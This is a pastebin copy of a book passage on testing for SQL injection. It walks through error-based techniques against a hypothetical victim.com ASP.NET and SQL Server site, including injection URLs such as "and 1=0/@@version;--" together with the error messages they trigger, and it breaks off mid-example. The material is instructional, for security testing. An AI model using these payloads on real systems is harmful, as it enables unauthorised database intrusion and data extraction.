sql

SUBMITTED BY: leakage

DATE: Dec. 7, 2015, 4:40 p.m.

FORMAT: Text only

SIZE: 4.4 kB

Raw Download

HITS: 147784

Report
  1. hapter 2 • Testing for SQL Injection
  2. current web request. Please review the stack trace for more information
  3. about the error and where it originated in the code.
  4. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation
  5. mark before the character string 'attaker;'.
  6. Obviously, you don’t have to memorize every error code. The important thing is that
  7. you understand when and why an error occurs. In both examples, you can assert that the
  8. remote SQL statement running on the database must be something similar to the following:
  9. SELECT *
  10. FROM products
  11. WHERE category='attacker''
  12. The application did not sanitize the single quotes, and therefore the syntax of the
  13. statement is rejected by the database server returning an error.
  14. You just saw an example of injection in an alphanumeric string. The following example
  15. will show the typical error returned when injecting a numeric value, therefore not enclosed
  16. between quotes in the SQL statement.
  17. Imagine you find a page called showproduct.aspx in the victim.com application.
  18. The script receives a parameter called id and displays a single product depending on the value
  19. of the id parameter:
  20. http://www.victim.com/showproduct.aspx?id=2
  21. When you change the value of the id parameter to something such as the following:
  22. http://www.victim.com/showproduct.aspx?id=attacker
  23. the application returns an error similar to this:
  24. Server Error in '/' Application.
  25. Invalid column name 'attacker'.
  26. Description: An unhandled exception occurred during the execution of the
  27. current web request. Please review the stack trace for more information
  28. about the error and where it originated in the code.
  29. Exception Details: System.Data.SqlClient.SqlException: Invalid column name
  30. 'attacker'.
  31. Based on the error, you can assume that in the first instance the application creates an
  32. SQL statement such as this:
  33. SELECT *
  34. FROM products
  35. WHERE idproduct=2
  36. The preceding statement returns a result set with the product whose idproduct field
  37. equals 2. However, when you inject a non-numeric value, such as attacker, the resultant SQL
  38. statement sent to the database server has the following syntax:
  39. Testing for SQL Injection • Chapter 2
  40. SELECT *
  41. FROM products
  42. WHERE idproduct=attacker
  43. The SQL server understands that if the value is not a number it must be a column name.
  44. In this case, the server looks for a column called attacker within the products table. However,
  45. there is no column named attacker, and therefore it returns an error.
  46. There are some techniques that you can use to retrieve information embedded in the
  47. errors returned from the database. The first one generates an error converting a string to an
  48. integer:
  49. http://www.victim.com/showproducts.aspx?category=bikes' and 1=0/@@version;--
  50. Application response:
  51. Server Error in '/' Application.
  52. Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 –
  53. 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft
  54. Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: ) ' to a
  55. column of data type int.
  56. Description: An unhandled exception occurred during the execution of the
  57. current web request. Please review the stack trace for more information
  58. about the error and where it originated in the code.
  59. The database reported an error, converting the result of @@version to an integer and
  60. displaying its contents. This technique abuses the type conversion functionality in SQL Server.
  61. We sent 0/@@version as part of our injected code. As a division operation needs to be executed
  62. between two numbers, the database tries to convert the result from the @@version function
  63. into a number. When the operation fails the database displays the content of the variable.
  64. You can use this technique to display any variable in the database. The following
  65. example uses this technique to display the user variable:
  66. http://www.victim.com/showproducts.aspx?category=bikes' and 1=0/user;--
  67. Application response:
  68. Syntax error converting the nvarchar value 'dbo' to a column of data type
  69. int.
  70. Description: An unhandled exception occurred during the execution of the
  71. current web request. Please review the stack trace for more information
  72. about the error and where it originated in the code.
  73. There are also techniques to display information about the statement executed by the
  74. database, such as the use of having 1=1:
  75. http://www.victim.com/showproducts.aspx?cat
comments powered by Disqus